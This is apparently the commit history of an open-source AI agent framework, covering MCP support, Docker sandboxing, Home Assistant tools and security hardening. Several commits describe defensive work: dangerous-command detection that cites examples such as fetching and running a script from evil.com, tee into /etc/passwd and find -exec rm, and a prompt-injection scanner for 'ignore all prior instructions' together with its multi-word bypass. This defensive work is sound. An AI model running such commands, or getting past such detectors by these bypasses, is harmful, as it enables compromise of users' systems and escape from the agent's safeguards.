0xbyt4	11a2ecb936	fix: resolve thread safety issues and shutdown deadlock in MCP client - Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread) - Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside a _lock block but also acquires _lock (non-reentrant) - Fix race condition in _ensure_mcp_loop with concurrent callers - Change idempotency to per-server (retry failed servers, skip connected) - Dynamic toolset injection via startswith("hermes-") instead of hardcoded list - Parallel shutdown via asyncio.gather instead of sequential loop - Add tests for partial failure retry, parallel shutdown, dynamic injection	2026-03-02 22:08:32 +03:00
0xbyt4	593c549bc4	fix: make discover_mcp_tools idempotent to prevent duplicate connections When discover_mcp_tools() is called multiple times (e.g. direct call then model_tools import), return existing tool names instead of opening new connections that would orphan the previous ones.	2026-03-02 21:34:21 +03:00
0xbyt4	aa2ecaef29	fix: resolve orphan subprocess leak on MCP server shutdown Refactor MCP connections from AsyncExitStack to task-per-server architecture. Each server now runs as a long-lived asyncio Task with `async with stdio_client(...)`, ensuring anyio cancel-scope cleanup happens in the same Task that opened the connection.	2026-03-02 21:22:00 +03:00
0xbyt4	3c252ae44b	feat: add MCP (Model Context Protocol) client support Connect to external MCP servers via stdio transport, discover their tools at startup, and register them into the hermes-agent tool registry. - New tools/mcp_tool.py: config loading, server connection via background event loop, tool handler factories, discovery, and graceful shutdown - model_tools.py: trigger MCP discovery after built-in tool imports - cli.py: call shutdown_mcp_servers in _run_cleanup - pyproject.toml: add mcp>=1.2.0 as optional dependency - 27 unit tests covering config, schema conversion, handlers, registration, SDK interaction, toolset injection, graceful fallback, and shutdown Config format (in ~/.hermes/config.yaml): mcp_servers: filesystem: command: "npx" args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]	2026-03-02 21:03:14 +03:00
BP602	6789084ec0	Fix ClawHub Skills Hub adapter for updated API	2026-03-02 16:11:49 +01:00
teknium1	4faf2a6cf4	Merge PR #233 : fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection Authored by Farukest. Fixes #232.	2026-03-02 04:44:06 -08:00
teknium1	8c48bb080f	refactor: remove unnecessary single-element loop in disk usage calc The 'for pattern in [f"hermes-{task_id[:8]}"]' was a loop over a single-element list — just use a plain variable instead.	2026-03-02 04:40:13 -08:00
teknium1	6d2481ee5c	Merge PR #231 : fix: use task-specific glob pattern in disk usage calculation Authored by Farukest. Fixes #230.	2026-03-02 04:38:58 -08:00
Dogila Developer	fd335a4e26	fix: add missing dangerous command patterns in approval.py Three attack vectors bypassed the dangerous command detection system: 1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env) were not detected. tee writes to files just like > but was absent from DANGEROUS_PATTERNS. Example: echo 'evil' \| tee /etc/passwd 2. curl/wget via process substitution bypassed the pipe-to-shell check. The existing pattern only matched curl ... \| bash but not bash <(curl ...) which is equally dangerous. Example: bash <(curl http://evil.com/install.sh) 3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not caught. The pattern only matched bare rm, not absolute paths. Example: find . -exec /bin/rm {} \;	2026-03-02 14:46:20 +03:00
teknium1	39bfd226b8	Merge PR #225 : fix: preserve empty content in ReadResult.to_dict() Authored by Farukest. Fixes #224.	2026-03-02 03:13:31 -08:00
teknium1	1cb2311bad	fix(security): block path traversal in skill_view file_path (fixes #220 ) skill_view accepted arbitrary file_path values like '../../.env' and would read files outside the skill directory, exposing API keys and other sensitive data. Added two layers of defense: 1. Reject paths with '..' components (fast, catches obvious traversal) 2. resolve() containment check with trailing '/' to prevent prefix collisions (catches symlinks and edge cases) Fix approach from PR #242 (@Bartok9). Vulnerability reported by @Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR. Closes #220	2026-03-02 02:00:09 -08:00
BathreeNode	bd8b20b933	Merge branch 'NousResearch:main' into main	2026-03-02 12:14:34 +03:00
teknium1	866fd9476b	fix(docker): remove --read-only and allow exec on /tmp for package installs The Docker sandbox previously used --read-only on the root filesystem and noexec on /tmp. This broke 30+ skills that need to install packages: - npm install -g (codex, claude-code, mcporter, powerpoint) - pip install (20+ mlops/media/productivity skills) - apt install (minecraft-modpack-server, ml-paper-writing) - Build tools that compile in /tmp (pip wheels, node-gyp) The container is already fully isolated from the host. Industry standard (E2B, Docker Sandboxes, OpenAI Codex) does not use --read-only — the container itself is the security boundary. Retained security hardening: - --cap-drop ALL (zero capabilities) - --security-opt no-new-privileges (no escalation) - --pids-limit 256 (no fork bombs) - Size-limited tmpfs for /tmp, /var/tmp, /run - nosuid on all tmpfs mounts - noexec on /var/tmp and /run (rarely need exec there) - Resource limits (CPU, memory, disk) - Ephemeral containers (destroyed after use) Fixes #189.	2026-03-02 01:09:34 -08:00
BathreeNode	d2ec5aaacf	fix(registry): preserve full traceback on tool dispatch errors logger.error() only records the exception message string, silently discarding the stack trace. Switch to logger.exception() which automatically appends the full traceback to the log output. Without this change, when a tool handler raises an unexpected error the log shows only the exception type and message, making it impossible to determine which line caused the failure or trace through nested calls.	2026-03-02 11:57:47 +03:00
teknium1	14396e3fe7	fix(delegate_tool): update max_iterations default from 25 to 50 for improved task handling	2026-03-02 00:51:10 -08:00
teknium1	1ad930cbd0	fix(delegate_tool): increase DEFAULT_MAX_ITERATIONS from 25 to 50 to enhance processing capabilities	2026-03-02 00:51:01 -08:00
teknium1	c84d5ce738	refactor(terminal_tool): clarify foreground and background process usage Updated documentation within terminal_tool.py to emphasize the appropriate use of foreground and background processes. Enhanced descriptions for the timeout setting and background execution to guide users towards optimal configurations for scripts, builds, and long-running tasks. Adjusted the default timeout value from 60 to 180 seconds for improved handling of longer operations.	2026-03-01 16:15:05 -08:00
teknium1	dda9f3e734	fix(process_registry): ensure unbuffered output for subprocesses Updated the environment variables for subprocess execution in the ProcessRegistry class to set PYTHONUNBUFFERED to "1". This change ensures that output from Python scripts is unbuffered, allowing for real-time visibility of progress during background execution. Adjusted both the pty and background process spawning methods to use the new environment configuration.	2026-03-01 16:14:57 -08:00
aydnOktay	196a13f3dc	Improve error handling and validation in transcription_tools	2026-03-02 01:53:18 +03:00
aydnOktay	440d33eec4	Improve error handling and type hints in session_search_tool	2026-03-02 01:50:37 +03:00
0xbyt4	3fdf03390e	Merge remote-tracking branch 'origin/main' into feature/homeassistant-integration # Conflicts: # run_agent.py	2026-03-01 11:59:12 +03:00
0xbyt4	25fb9aafcb	fix: add service domain blocklist and entity_id validation to HA tools Block dangerous HA service domains (shell_command, command_line, python_script, pyscript, hassio, rest_command) that allow arbitrary code execution or SSRF. Add regex validation for entity_id to prevent path traversal attacks. 17 new tests covering both security features.	2026-03-01 11:53:50 +03:00
teknium1	41d8a80226	fix(display): fix subagent progress tree-view visual nits Two fixes to the subagent progress display from PR #186: 1. Task index prefix: show 1-indexed prefix ([1], [2], ...) for ALL tasks in batch mode (task_count > 1). Single tasks get no prefix. Previously task 0 had no prefix while others did, making batch output confusing. 2. Completion indicator: use spinner.print_above() instead of raw print() for per-task completion lines (✓ [1/2] ...). Raw print collided with the active spinner, mushing the completion text onto the spinner line. Now prints cleanly above. Added task_count parameter to _build_child_progress_callback and _run_single_child. Updated tests accordingly.	2026-02-28 23:29:49 -08:00
lila	dd69f16c3e	feat(gateway): expose subagent tool calls and thinking to user (fixes #169 ) (#186 ) When subagents run via delegate_task, the user now sees real-time progress instead of silence: CLI: tree-view activity lines print above the delegation spinner 🔀 Delegating: research quantum computing ├─ 💭 "I'll search for papers first..." ├─ 🔍 web_search "quantum computing" ├─ 📖 read_file "paper.pdf" └─ ⠹ working... (18.2s) Gateway (Telegram/Discord): batched progress summaries sent every 5 tool calls to avoid message spam. Remaining tools flushed on subagent completion. Changes: - agent/display.py: add KawaiiSpinner.print_above() to print status lines above an active spinner without disrupting animation. Uses captured stdout (self._out) so it works inside the child's redirect_stdout(devnull). - tools/delegate_tool.py: add _build_child_progress_callback() that creates a per-child callback relaying tool calls and thinking events to the parent's spinner (CLI) or progress queue (gateway). Each child gets its own callback instance, so parallel subagents don't share state. Includes _flush() for gateway batch completion. - run_agent.py: fire tool_progress_callback with '_thinking' event when the model produces text content. Guarded by _delegate_depth > 0 so only subagents fire this (prevents gateway spam from main agent). REASONING_SCRATCHPAD/think/ reasoning XML tags are stripped before display. Tests: 21 new tests covering print_above, callback builder, thinking relay, SCRATCHPAD filtering, batching, flush, thread isolation, delegate_depth guard, and prefix handling.	2026-02-28 23:18:00 -08:00
teknium1	1db5598294	feat(tests): add live integration tests for file operations and shell noise filtering - Introduce a new test suite in `test_file_tools_live.py` to validate file operations and ensure accurate command execution in a real environment. - Implement assertions to check for shell noise contamination in outputs, enhancing the reliability of command results. - Create fixtures for setting up a local environment and populating directories with known file contents for comprehensive testing. - Refactor shell noise handling in `process_registry.py` and `local.py` to support multiple noise patterns, improving output cleanliness.	2026-02-28 22:57:58 -08:00
teknium1	70dfec9638	test(redact): add sensitive text redaction - Introduce a new test suite for the `redact_sensitive_text` function, covering various sensitive data formats including API keys, tokens, and environment variables. - Ensure that sensitive information is properly masked in logs and outputs while non-sensitive data remains unchanged. - Add tests for different scenarios including JSON fields, authorization headers, and environment variable assignments. - Implement a redacting formatter for logging to enhance security during log output.	2026-02-28 21:56:27 -08:00
teknium1	500f0eab4a	refactor(cli): Finalize OpenAI Codex Integration with OAuth - Enhanced Codex model discovery by fetching available models from the API, with fallback to local cache and defaults. - Updated the context compressor's summary target tokens to 2500 for improved performance. - Added external credential detection for Codex CLI to streamline authentication. - Refactored various components to ensure consistent handling of authentication and model selection across the application.	2026-02-28 21:47:51 -08:00
Teknium	5a79e423fe	Merge branch 'main' into codex/align-codex-provider-conventions-mainrepo	2026-02-28 18:13:38 -08:00
Farukest	7166647ca1	fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection	2026-03-01 03:23:29 +03:00
Farukest	f7300a858e	fix(tools): use task-specific glob pattern in disk usage calculation	2026-03-01 03:17:50 +03:00
Farukest	7f1f4c2248	fix(tools): preserve empty content in ReadResult.to_dict()	2026-03-01 02:42:15 +03:00
Farukest	3f58e47c63	fix: guard POSIX-only process functions for Windows compatibility os.setsid, os.killpg, and os.getpgid do not exist on Windows and raise AttributeError on import or first call. This breaks the terminal tool, code execution sandbox, process registry, and WhatsApp bridge on Windows. Added _IS_WINDOWS platform guard in all four affected files, following the pattern documented in CONTRIBUTING.md. On Windows, preexec_fn is set to None and process termination falls back to proc.terminate() / proc.kill() instead of process group signals. Files changed: - tools/environments/local.py (3 call sites) - tools/process_registry.py (2 call sites) - tools/code_execution_tool.py (3 call sites) - gateway/platforms/whatsapp.py (3 call sites)	2026-03-01 01:54:27 +03:00
VolodymyrBg	6cbb8f3a0c	fix: align _apply_delete comment with actual behavior	2026-02-28 22:58:01 +02:00
teknium1	2205b22409	fix(headers): update X-OpenRouter-Categories to include 'productivity'	2026-02-28 10:38:49 -08:00
0xbyt4	08250a53a1	fix: skills hub dedup prefers higher trust levels + 43 tests - unified_search and GitHubSource.search dedup: replace naive `trust_level == "trusted"` check with ranked comparison so "builtin" results are never overwritten by "trusted" or "community" - Add 43 unit tests covering _parse_frontmatter_quick, trust_level_for, HubLockFile CRUD, TapsManager ops, LobeHub _convert_to_skill_md, unified_search dedup (with regression test), and append_audit_log	2026-02-28 21:25:55 +03:00
0xbyt4	4ea29978fc	fix(security): catch multi-word prompt injection in skills_guard The regex `ignore\s+(previous\|all\|...)\s+instructions` only matched a single keyword between 'ignore' and 'instructions'. Phrases like 'ignore all prior instructions' bypassed the scanner entirely. Changed to `ignore\s+(?:\w+\s+)*(previous\|all\|...)\s+instructions` to allow arbitrary words before the keyword.	2026-02-28 20:16:48 +03:00
0xbyt4	2390728cc3	fix: resolve 4 bugs found in HA integration code review - Auto-authorize HA events in gateway (system-generated, not user messages) - Guard _read_events against None/closed WebSocket after failed reconnect - Use UUID for send() message_id instead of polluting WS sequence counter - entity_id parameter now takes precedence over data["entity_id"]	2026-02-28 15:12:18 +03:00
0xbyt4	c36b256de5	feat: add Home Assistant integration (REST tools + WebSocket gateway) - Add ha_list_entities, ha_get_state, ha_call_service tools via REST API - Add WebSocket gateway adapter for real-time state_changed event monitoring - Support domain/entity filtering, cooldown, and auto-reconnect with backoff - Use REST API for outbound notifications to avoid WS race condition - Gate tool availability on HASS_TOKEN env var - Add 82 unit tests covering real logic (filtering, payload building, event pipeline)	2026-02-28 13:32:48 +03:00
teknium1	1d7ce5e063	feat: integrate honcho-ai package and enhance tool progress callback in delegate_tool	2026-02-27 23:45:52 -08:00
Teknium	4a9086b848	Merge branch 'main' into feat/honcho-integration	2026-02-27 23:32:49 -08:00
Teknium	2b821c3a14	Merge pull request #162 from aydnOktay/fix/memory-tool-entry-delimiter-parsing Fix memory tool entry parsing when content contains section sign	2026-02-27 23:13:15 -08:00
Teknium	0d113fab1a	Merge pull request #158 from Indelwin/feature/docker-volumes feat: add docker_volumes config for custom volume mounts	2026-02-27 23:06:06 -08:00
teknium1	66a5bc64db	fix(process): use shlex to safely quote commands in bg_command for improved security	2026-02-27 22:50:26 -08:00
Teknium	7f423508e4	Merge pull request #151 from johnh4098/fix/shell-injection-spawn-via-env-v2 fix(process): escape single quotes in spawn_via_env bg_command	2026-02-27 22:49:04 -08:00
teknium1	fb7df099e0	feat(cli): add shell noise filtering and improve command execution with interactive login shell	2026-02-27 16:26:47 -08:00
teknium1	f14ff3e041	feat(cli): use user's login shell for command execution to ensure environment consistency	2026-02-27 15:10:27 -08:00
aydnOktay	66d9983d46	Fix memory tool entry parsing when content contains section sign - Use ENTRY_DELIMITER (\\nÂ§\\n) instead of 'Â§' when splitting entries in _read_file - Prevents incorrect parsing when memory entries contain 'Â§' character - Aligns read logic with write logic for consistency	2026-02-28 01:33:41 +03:00
Gesina Sands	f7677ed275	feat: add docker_volumes config for custom volume mounts	2026-02-28 07:12:48 +10:00
johnh4098	e5f719a33b	fix(process): escape single quotes in spawn_via_env bg_command	2026-02-27 21:03:17 +03:30
teknium1	5007a122b2	fix(terminal): enhance error logging in cleanup functions with exception info	2026-02-27 03:53:58 -08:00
Teknium	547ba73b82	Merge pull request #65 from leonsgithub/fix/sudo-password-shell-injection fix(security): prevent shell injection in sudo password piping	2026-02-27 01:50:07 -08:00
Teknium	152271851f	Merge pull request #63 from 0xbyt4/fix/cron-prompt-injection-bypass fix: cron prompt injection scanner bypass for multi-word variants	2026-02-27 01:34:14 -08:00
Teknium	0909be3aa8	Merge pull request #61 from 0xbyt4/fix/write-deny-macos-symlink fix: resolve symlink bypass in write deny list on macOS	2026-02-27 01:32:19 -08:00
Teknium	2972f982e4	Merge pull request #55 from bierlingm/fix/atexit-signal-handler-race Fix SystemExit traceback during atexit cleanup on Ctrl+C	2026-02-27 00:42:23 -08:00
teknium1	19abbfff96	feat(ocr-and-documents): add OCR and document extraction skills - Introduced new skills for extracting text from PDFs, scanned documents, and images using OCR and document parsing tools. - Added detailed documentation for usage and installation of `pymupdf` and `marker-pdf` for local extraction. - Implemented scripts for text extraction with both lightweight and high-quality options, including support for various document formats. - Updated web extraction functionality to handle PDF URLs directly, enhancing usability for academic papers and documents.	2026-02-26 23:06:08 -08:00
Teknium	21cf339a85	Merge pull request #59 from deankerr/fix/ssh-terminal-check fix: add SSH backend to terminal requirements check	2026-02-26 21:22:47 -08:00
teknium1	0cce536fb2	fix: fileops on mac Co-authored-by: Dean Kerr <dean.kerr@gmail.com>	2026-02-26 21:20:25 -08:00
teknium1	58fce0a37b	feat(api): implement dynamic max tokens handling for various providers - Added _max_tokens_param method in AIAgent to return appropriate max tokens parameter based on the provider (OpenAI vs. others). - Updated API calls in AIAgent to utilize the new max tokens handling. - Introduced auxiliary_max_tokens_param function in auxiliary_client for consistent max tokens management across auxiliary clients. - Refactored multiple tools to use auxiliary_max_tokens_param for improved compatibility with different models and providers.	2026-02-26 20:23:56 -08:00
teknium1	a5ea272936	refactor: streamline API key retrieval in transcription and TTS tools - Removed fallback to OPENAI_API_KEY in favor of exclusively using VOICE_TOOLS_OPENAI_KEY for improved clarity and consistency. - Updated environment variable checks to ensure only VOICE_TOOLS_OPENAI_KEY is considered, enhancing error handling and messaging.	2026-02-26 19:56:42 -08:00
Erosika	ab4bbf2fb2	feat: add Honcho AI-native memory integration Opt-in persistent cross-session user modeling via Honcho. Reads ~/.honcho/config.json as single source of truth (shared with Claude Code, Cursor, and other Honcho-enabled tools). Zero impact when disabled or unconfigured. - honcho_integration/ package (client, session manager, peer resolution) - Host-based config resolution matching claude-honcho/cursor-honcho pattern - Prefetch user context into system prompt per conversation turn - Sync user/assistant messages to Honcho after each exchange - query_user_context tool for mid-conversation dialectic reasoning - Gated activation: requires ~/.honcho/config.json with enabled=true	2026-02-26 18:07:17 -05:00
teknium1	760fb2ca0e	feat(install): enhance installation script for build tools and interactive prompts - Updated the installation script to check for necessary build tools on Debian/Ubuntu systems and prompt the user to install them if missing. - Improved user interaction by redirecting input from /dev/tty for prompts, ensuring compatibility when the script is piped from curl. - Added checks to verify the successful installation of the main package and provide guidance if installation fails. - Enhanced the handling of shell configuration files to ensure ~/.local/bin is added to PATH for various shell types.	2026-02-26 11:37:40 -08:00
George Pickett	32070e6bc0	Merge remote-tracking branch 'origin/main' into codex/align-codex-provider-conventions-mainrepo # Conflicts: # cron/scheduler.py # gateway/run.py # tools/delegate_tool.py	2026-02-26 10:56:29 -08:00
darya	3227cc65d1	fix: prevent false positives in recursive delete detection The regex pattern for detecting recursive delete commands (rm -r, rm -rf, etc.) incorrectly matched filenames starting with 'r' — e.g., 'rm readme.txt' was flagged as 'recursive delete' because the dash-flag group was optional. Fix: make the dash mandatory so only actual flags (-r, -rf, -rfv, -fr) are matched. This eliminates false approval prompts for innocent commands like 'rm readme.txt', 'rm requirements.txt', 'rm report.csv', etc. Before: \brm\s+(-[^\s])?r — matches 'rm readme.txt' (false positive) After: \brm\s+-[^\s]r — requires '-' prefix, no false positives	2026-02-26 16:32:01 +03:00
Leon	25e260bb3a	fix(security): prevent shell injection in sudo password piping The sudo password was embedded in shell commands via single-quote interpolation: echo '{password}' \| sudo -S If the password contained shell metacharacters (single quotes, $(), backticks), they would be interpreted by the shell, enabling arbitrary command execution. Fix: use shlex.quote() which properly escapes all shell-special characters, ensuring the password is always treated as a literal string argument to echo.	2026-02-26 19:04:32 +07:00
0xbyt4	feea8332d6	fix: cron prompt injection scanner bypass for multi-word variants The regex `ignore\s+(previous\|all\|above\|prior)\s+instructions` only allowed ONE word between "ignore" and "instructions". Multi-word variants like "Ignore ALL prior instructions" bypassed the scanner because "ALL" matched the alternation but then `\s+instructions` failed to match "prior". Fix: use `(?:\w+\s+)*` groups to allow optional extra words before and after the keyword alternation.	2026-02-26 13:55:54 +03:00
0xbyt4	2efd9bbac4	fix: resolve symlink bypass in write deny list on macOS On macOS, /etc is a symlink to /private/etc. The _is_write_denied() function resolves the input path with os.path.realpath() but the deny list entries were stored as literal strings ("/etc/shadow"). This meant the resolved path "/private/etc/shadow" never matched, allowing writes to sensitive system files on macOS. Fix: Apply os.path.realpath() to deny list entries at module load time so both sides of the comparison use resolved paths. Adds 19 regression tests in tests/tools/test_write_deny.py.	2026-02-26 13:30:55 +03:00
Dean Kerr	fed9f06c4e	fix: add SSH backend to terminal requirements check The SSH backend was missing from check_terminal_requirements(), causing it to fall through to `return False`. This silently disabled both the terminal and file tools when TERMINAL_ENV=ssh was configured. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-26 20:41:59 +11:00
teknium1	240f33a06f	feat(docker): add support check for Docker's --storage-opt option - Introduced a static method to verify if the Docker storage driver supports the --storage-opt size= option. - Enhanced resource argument handling in DockerEnvironment to conditionally include storage options based on the support check. - Added caching for the support check result to optimize performance across instances.	2026-02-26 01:15:56 -08:00
Moritz Bierling	254aafb265	Fix SystemExit traceback during atexit cleanup on Ctrl+C The browser_tool signal handler calls sys.exit(130) which raises SystemExit. When this fires during terminal_tool's atexit cleanup (specifically during _cleanup_thread.join()), it produces an unhandled traceback. Wrapping the join in a try/except suppresses the race without changing shutdown behavior. 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude <noreply@anthropic.com>	2026-02-26 10:13:31 +01:00
Teknium	faa185e37c	Merge branch 'main' into fix/docker-backend-macos	2026-02-25 23:14:57 -08:00
teknium1	e5bd25c73f	Fix: #41	2026-02-25 21:16:15 -08:00
Raeli Savitt	95b6bd5df6	Harden agent attack surface: scan writes to memory, skills, cron, and context files The security scanner (skills_guard.py) was only wired into the hub install path. All other write paths to persistent state — skills created by the agent, memory entries, cron prompts, and context files — bypassed it entirely. This closes those gaps: - file_operations: deny-list blocks writes to ~/.ssh, ~/.aws, ~/.hermes/.env, etc. - code_execution_tool: filter secret env vars from sandbox child process - skill_manager_tool: wire scan_skill() into create/edit/patch/write_file with rollback - skills_guard: add "agent-created" trust level (same policy as community) - memory_tool: scan content for injection/exfil before system prompt injection - prompt_builder: scan AGENTS.md, .cursorrules, SOUL.md for prompt injection - cronjob_tools: scan cron prompts for critical threats before scheduling Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-25 23:43:15 -05:00
Raeli Savitt	0310170869	Fix subagent auth: propagate parent API key to child agents When using Nous Portal (or any non-OpenRouter provider), child agents spawned by delegate_task failed with "No pricing available" or "Unknown model" errors because they had no valid API key. The delegate tool passed base_url but not api_key to child AIAgent instances. Without an explicit key, children fell back to the empty OPENROUTER_API_KEY env var, causing auth failures. Extract the parent's API key from _client_kwargs and pass it through. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-25 22:37:36 -05:00
Raeli Savitt	b6d7e222c1	Fix Docker backend failures on macOS Three issues prevented the Docker terminal backend from working: 1. `effective_image` was referenced but never defined — only the Modal backend sets this variable. Use `image` directly instead. 2. `--storage-opt size=N` is unsupported on Docker Desktop for Mac (requires overlay2 with xfs backing). Skip the flag on Darwin. 3. Docker requires absolute paths for `-w` (working directory) but the default cwd was `~`, which Docker does not expand. Default to `/root` and translate any `~` passed in from callers. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-25 22:31:05 -05:00
George Pickett	e71d9a89d2	Merge origin/main into codex/align-codex-provider-conventions-mainrepo	2026-02-25 19:28:44 -08:00
teknium1	7a3656aea2	refactor: integrate Nous Portal support in auxiliary client - Added functionality to include product attribution tags for Nous Portal in auxiliary API calls. - Introduced a mechanism to determine if the auxiliary client is backed by Nous Portal, affecting the extra body of requests. - Updated various tools to utilize the new extra body configuration for enhanced tracking in API calls.	2026-02-25 18:39:36 -08:00
George Pickett	609b19b630	Add OpenAI Codex provider runtime and responses integration (without .agent/PLANS.md)	2026-02-25 18:20:38 -08:00
teknium1	9a858b8d67	add identifier for openrouter calls	2026-02-25 16:34:47 -08:00
teknium1	f64a87209d	refactor: enhance session content handling in AIAgent and update TTS output path - Introduced a new static method `_clean_session_content` in the `AIAgent` class to convert REASONING_SCRATCHPAD tags to <think> blocks and clean up whitespace in session logs. - Updated the `_save_session_log` method to utilize the cleaned content for assistant messages, ensuring consistency in session logs. - Changed the default output directory for TTS audio files from `~/voice-memos` to `~/.hermes/audio_cache`, reflecting a more appropriate storage location.	2026-02-25 04:22:03 -08:00
teknium1	6877d5f3b5	docs: add note on message delivery in cronjob_tools - Included a note clarifying that the agent's final response is auto-delivered to the target, advising against using send_message in the prompt. This enhances user understanding of the message delivery process.	2026-02-25 03:29:10 -08:00
teknium1	91907789af	refactor: remove temporary debug logging in code execution tool - Eliminated the temporary debug logging in the `execute_code` function that tracked enabled and sandbox tools, streamlining the code and reducing clutter.	2026-02-24 14:25:53 -08:00
teknium1	6845852e82	refactor: update failure message handling in display module and add debug logging in code execution tool - Modified the `_wrap` function to append a failure suffix without applying red coloring, simplifying the failure message format. - Introduced temporary debug logging in the `execute_code` function to track enabled and sandbox tools, aiding in troubleshooting.	2026-02-24 14:25:53 -08:00
teknium1	fd76ff60ac	fix: improve stdout/stderr handling in delegate_task function - Saved and restored stdout/stderr to prevent redirection issues in child threads, ensuring consistent output during task delegation. - Enhanced reliability of output handling in concurrent execution scenarios.	2026-02-24 04:13:32 -08:00
teknium1	cc6bea8b90	feat: enhance session search tool with parent session resolution and parallel summarization - Added a new function to resolve child sessions to their parent, improving session grouping and deduplication. - Refactored session summarization to run in parallel, enhancing performance and responsiveness. - Updated search syntax documentation to clarify usage of keywords and phrases for better search results.	2026-02-24 04:07:37 -08:00
teknium1	2bf96ad244	feat: add ephemeral prefill messages and system prompt loading - Implemented functionality to load ephemeral prefill messages from a JSON file, enhancing few-shot priming capabilities for the agent. - Introduced a mechanism to load an ephemeral system prompt from environment variables or configuration files, ensuring dynamic prompt adjustments at API-call time. - Updated the CLI and agent initialization to utilize the new prefill messages and system prompt, improving the overall interaction experience. - Enhanced configuration options with new environment variables for prefill messages and system prompts, allowing for greater customization without persistence.	2026-02-23 23:55:42 -08:00
teknium1	a183827128	feat: enhance README and improve environment configuration - Added a new section in the README for Inference Providers, detailing setup instructions for Nous Portal, OpenRouter, and Custom Endpoints, improving user guidance for LLM connections. - Updated messaging platform setup instructions to include Slack and WhatsApp, providing clearer steps for configuration. - Introduced a new environment variable, TERMINAL_SANDBOX_DIR, to allow users to customize the sandbox storage location for Docker and Singularity environments. - Refactored the Docker and Singularity environment classes to utilize the new sandbox directory for persistent workspaces, enhancing organization and usability. - Improved handling of working directories across various environments, ensuring compatibility and clarity in execution paths.	2026-02-23 21:15:35 -08:00
teknium1	54dd1b3038	feat: enhance README and update API client initialization - Updated the README to include new badges, a detailed description of the Hermes Agent, and a table summarizing its features, improving clarity and presentation for users. - Modified the API client initialization in `transcription_tools.py` and `tts_tool.py` to include a base URL, ensuring compatibility with the OpenAI API.	2026-02-23 20:59:39 -08:00
Teknium	0858ee2f27	refactor: rename HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY - Updated the environment variable name from HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY across multiple files to avoid interference with OpenRouter. - Adjusted related error messages and configuration prompts to reflect the new variable name, ensuring consistency throughout the codebase.	2026-02-23 23:21:33 +00:00
teknium1	90af34bc83	feat: enhance interrupt handling and container resource configuration - Introduced a shared interrupt signaling mechanism to allow tools to check for user interrupts during long-running operations. - Updated the AIAgent to handle interrupts more effectively, ensuring in-progress tool calls are canceled and multiple interrupt messages are combined into one prompt. - Enhanced the CLI configuration to include container resource limits (CPU, memory, disk) and persistence options for Docker, Singularity, and Modal environments. - Improved documentation to clarify interrupt behaviors and container resource settings, providing users with better guidance on configuration and usage.	2026-02-23 02:11:33 -08:00
teknium1	08e4dc2563	feat: implement channel directory and message mirroring for cross-platform communication - Introduced a new channel directory to cache reachable channels/contacts for messaging platforms, enhancing the send_message tool's ability to resolve human-friendly names to numeric IDs. - Added functionality to mirror sent messages into the target's session transcript, providing context for cross-platform message delivery. - Updated the send_message tool to support listing available targets and improved error handling for channel resolution. - Enhanced the gateway to build and refresh the channel directory during startup and at regular intervals, ensuring up-to-date channel information.	2026-02-22 20:44:15 -08:00
teknium1	e0ed44388f	fix: improve error messaging for chat ID and home channel configuration - Enhanced warning in `_deliver_result` to provide clearer instructions for setting the home channel. - Updated error message in `send_message_tool` to specify how to set a home channel when no chat ID is provided, improving user guidance.	2026-02-22 17:28:52 -08:00
teknium1	e1604b2b4a	feat: enhance user authorization checks in GatewayRunner - Updated the authorization logic to include a per-platform allow-all flag for improved flexibility. - Revised the order of checks to prioritize platform-specific allow-all settings, followed by environment variable allowlists and DM pairing approvals. - Added global allow-all configuration for broader access control. - Improved handling of allowlists by stripping whitespace and ensuring valid entries are processed.	2026-02-22 16:32:08 -08:00
teknium1	c2d5f7bf26	feat: add timestamp formatting function for session metadata - Introduced a new `_format_timestamp` function to convert Unix timestamps and ISO strings into a human-readable date format. - Updated the session metadata handling to use the new formatting function for improved clarity in session start dates. - Adjusted the output structure to reflect the change from "Session started" to "Session date" for better user understanding.	2026-02-22 02:37:26 -08:00
teknium1	e223b4ac09	Enhance agent guidance with memory and session search tools - Introduced MEMORY_GUIDANCE and SESSION_SEARCH_GUIDANCE to improve agent's contextual awareness and proactive assistance. - Updated AIAgent to conditionally include tool-aware guidance in prompts based on available tools. - Enhanced descriptions in memory and session search schemas for clearer user instructions on when to utilize these features.	2026-02-22 02:31:52 -08:00
teknium1	ededaaa874	Hermes Agent UX Improvements	2026-02-22 02:16:11 -08:00
teknium1	9123cfb5dd	Refactor Terminal and AIAgent cleanup	2026-02-21 22:31:43 -08:00
teknium1	08ff1c1aa8	More major refactor/tech debt removal!	2026-02-21 20:22:33 -08:00
teknium1	6134939882	refactor: deduplicate toolsets, unify async bridging, fix approval race condition, harden security - Replace 4 copy-pasted messaging platform toolsets with shared _HERMES_CORE_TOOLS list - Consolidate 5 ad-hoc async-bridging patterns into single _run_async() in model_tools.py - Removes deprecated get_event_loop()/set_event_loop() calls - Makes all tool handlers self-protecting regardless of caller's event loop state - RL handler refactored from if/elif chain to dispatch dict - Fix exec approval race condition: replace module-level globals with thread-safe per-session tools/approval.py (submit_pending, pop_pending, approve_session, is_approved) - Session A approving "rm" no longer approves it for all other sessions - Fix config deep merge: user overriding tts.elevenlabs.voice_id no longer clobbers tts.elevenlabs.model_id; migration detection now recurses to arbitrary depth - Gateway default-deny: unauthenticated users denied unless GATEWAY_ALLOW_ALL_USERS=true - Add 10 dangerous command patterns: rm --recursive, bash -c, python -e, curl\|bash, xargs rm, find -delete - Sanitize gateway error messages: users see generic message, full traceback goes to logs	2026-02-21 18:28:49 -08:00
